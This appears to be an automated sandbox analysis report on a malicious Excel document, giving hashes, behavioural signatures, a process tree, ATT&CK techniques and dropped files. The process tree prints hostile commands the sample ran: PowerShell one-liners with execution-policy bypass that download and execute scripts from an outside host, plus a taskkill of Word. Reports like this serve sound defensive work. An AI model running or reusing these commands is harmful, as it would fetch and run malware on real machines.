Analysis

  • max time kernel
    151s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    16-08-2022 07:46

General

  • Target

    SecuriteInfo.com.Exploit.Siggen3.17232.13662.xls

  • Size

    33KB

  • MD5

    5697889766e4385824c686b931e751fb

  • SHA1

    24707eb5f1fccc64376493fd5fccb8deabe4ad11

  • SHA256

    51a60269cd9f235a93ac58aca692e19058161c78531a1af3cb35a8051a373eca

  • SHA512

    9ea8a6667596f8c97a22c01fcd7e5f6d794decf12989e6bde5d711344f9b5e3b2fa3a7fa21c0b6cf50a37a0ba6067ad57e427e4f12a3144906f36939c27fc75c

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.13662.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1280
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:624
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 80 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:588
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:680
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1108
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1212
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 85 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1412
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:964
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 10 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1400
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1928
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min taskkill /f /im WINWORD.EXE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:396
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im WINWORD.EXE
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2024
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1940
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 7 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1696

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    d4d4cd591c964a02d8599d937aadc32d

    SHA1

    2cf4dfa1ef08f95e7d30dad1b292e8420ae13518

    SHA256

    82670091e7f4e0235283b75a325bffd13236421923543a79eefba3729c73d6cf

    SHA512

    49037d5c74bbb4a5874c2fe8e3f71bb13009b35f2d3b4b4dde393f3c0fdbb756b6d8fa6aae1b2bfb2c9a4db6c08f66c0abe8d60958c3a78039caa5f7c864a0fd

  • C:\Users\Public\DefenderFile.bat
    Filesize

    1KB

    MD5

    ae4a0997ce01f4ebbb3f3cc0054ce933

    SHA1

    e5bfe3b390f1208b8b6ea0317f4364005f552851

    SHA256

    a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce

    SHA512

    5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

  • C:\Users\Public\Outlook.bat
    Filesize

    900B

    MD5

    0427a3545c2eaed3167cffe2cf5f8aba

    SHA1

    b27f3a7d2b855f1d0b84727603add711bb6f6170

    SHA256

    ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391

    SHA512

    fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

  • memory/396-73-0x0000000000000000-mapping.dmp
  • memory/588-65-0x0000000000000000-mapping.dmp
  • memory/624-61-0x0000000000000000-mapping.dmp
  • memory/680-81-0x0000000000000000-mapping.dmp
  • memory/964-63-0x0000000000000000-mapping.dmp
  • memory/1108-82-0x0000000000000000-mapping.dmp
  • memory/1108-85-0x0000000073B00000-0x00000000740AB000-memory.dmp
    Filesize

    5.7MB

  • memory/1212-62-0x0000000000000000-mapping.dmp
  • memory/1280-59-0x0000000000528000-0x000000000052B000-memory.dmp
    Filesize

    12KB

  • memory/1280-54-0x000000002F741000-0x000000002F744000-memory.dmp
    Filesize

    12KB

  • memory/1280-69-0x0000000071F6D000-0x0000000071F78000-memory.dmp
    Filesize

    44KB

  • memory/1280-60-0x0000000000528000-0x000000000052B000-memory.dmp
    Filesize

    12KB

  • memory/1280-78-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1280-58-0x0000000075811000-0x0000000075813000-memory.dmp
    Filesize

    8KB

  • memory/1280-57-0x0000000071F6D000-0x0000000071F78000-memory.dmp
    Filesize

    44KB

  • memory/1280-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1280-55-0x0000000070F81000-0x0000000070F83000-memory.dmp
    Filesize

    8KB

  • memory/1280-79-0x0000000071F6D000-0x0000000071F78000-memory.dmp
    Filesize

    44KB

  • memory/1400-67-0x0000000000000000-mapping.dmp
  • memory/1412-66-0x0000000000000000-mapping.dmp
  • memory/1696-68-0x0000000000000000-mapping.dmp
  • memory/1820-71-0x0000000000000000-mapping.dmp
  • memory/1928-77-0x000000006B4A0000-0x000000006BA4B000-memory.dmp
    Filesize

    5.7MB

  • memory/1928-76-0x000000006B4A0000-0x000000006BA4B000-memory.dmp
    Filesize

    5.7MB

  • memory/1928-72-0x0000000000000000-mapping.dmp
  • memory/1940-64-0x0000000000000000-mapping.dmp
  • memory/2024-75-0x0000000000000000-mapping.dmp